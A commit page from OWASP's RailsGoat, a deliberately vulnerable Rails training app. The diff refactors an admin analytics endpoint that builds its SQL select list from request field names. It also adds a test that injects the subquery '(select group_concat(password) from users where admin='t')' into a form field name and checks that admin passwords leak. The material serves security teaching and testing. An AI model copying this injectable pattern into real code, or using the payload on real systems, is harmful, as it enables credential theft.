Merge branch 'add-test-case-for-a1-field-injection' of https://github…

….com/jmmastey/railsgoat into jmmastey-add-test-case-for-a1-field-injection
OWASP · Oct 2, 2017 · f5cfec3 · f5cfec3
2 parents e139019 + 585f566
commit f5cfec3
Show file tree

Hide file tree

Showing 3 changed files with 38 additions and 11 deletions.
diff --git a/app/controllers/admin_controller.rb b/app/controllers/admin_controller.rb
@@ -9,7 +9,7 @@ def analytics
     if params[:field].nil?
       fields = "*"
     else
-      fields = params[:field].map {|k,v| k }.join(",")
+      fields = custom_fields.join(",")
     end
 
     if params[:ip]
@@ -60,6 +60,11 @@ def delete_user
 
   private
 
+  def custom_fields
+    params.require(:field).keys
+  end
+  helper_method :custom_fields
+
   def admin_param
     params[:admin_id] != '1'
   end

diff --git a/app/views/admin/analytics.html.erb b/app/views/admin/analytics.html.erb
@@ -1,18 +1,18 @@
-<form action="">
-  Search by IP: <input type="text" name="ip"><br />
-  <input type="checkbox" value="" name="field[ip_address]"> IP Address<br />
-  <input type="checkbox" value="" name="field[referrer]"> Referrer<br />
-  <input type="checkbox" value="" name="field[user_agent]"> User Agent
+<form action="" id="analytics_search">
+  Search by IP: <input type="text" id="ip" name="ip"><br />
+  <input type="checkbox" value="" id="field_ip_address" name="field[ip_address]"> IP Address<br />
+  <input type="checkbox" value="" id="field_referrer" name="field[referrer]"> Referrer<br />
+  <input type="checkbox" value="" id="field_user_agent" name="field[user_agent]"> User Agent
 </form>
 
 <div id="dt_example" class="example_alt_pagination">
-    <table class="table table-striped table-hover table-bordered pull-left" id="data-table">
+    <table class="table table-striped table-hover table-bordered pull-left <%= "custom" if params[:field] %>" id="data-table">
       <thead>
         <tr>
           <%
-          count = (params[:field] ? params[:field].count : 3)
+          count = (params[:field] ? (custom_fields.count+1) : 6)
           count.times do %>
-          <td>&nbsp;</td>
+          <th>&nbsp;</th>
           <% end %>
         </tr>
       </thead>
@@ -33,6 +33,8 @@
   </div>
 </div>
 
+<%= javascript_include_tag "jquery.dataTables.js"%>
+
 <script type="text/javascript">
 
 function dataTablePagination(){
@@ -42,4 +44,4 @@ function dataTablePagination(){
 };
 
 $(document).ready(dataTablePagination());
-</script>
+</script>
diff --git a/spec/vulnerabilities/sql_injection_spec.rb b/spec/vulnerabilities/sql_injection_spec.rb
@@ -1,7 +1,7 @@
 require 'spec_helper'
 
 feature 'sql injection' do
-  before do
+  before(:each) do
     UserFixture.reset_all_users
     @normal_user = UserFixture.normal_user
     @admin_user = User.where("admin='t'").first
@@ -28,4 +28,24 @@
     expect(@admin_user.email).to eq('[email protected]')
     expect(@admin_user.admin).to eq(true)
   end
+
+  scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-SQL-Injection-Interpolation", js: true do
+    login(@normal_user)
+    Analytics.create!(ip_address: "::1")
+
+    visit "/admin/1/analytics"
+
+    within('#analytics_search') do
+      fill_in 'ip', :with => '::1'
+      check "field_user_agent"
+      payload = "(select group_concat(password) from users where admin='t')"
+
+      page.execute_script "$('#field_user_agent').attr('name', \"field[#{payload}]\");"
+      page.execute_script "$('#analytics_search').submit();"
+    end
+
+    pending if verifying_fixed?
+    expect(page).to have_css(".dataTable.custom")
+    expect(page.source).to include(@admin_user.password)
+  end
 end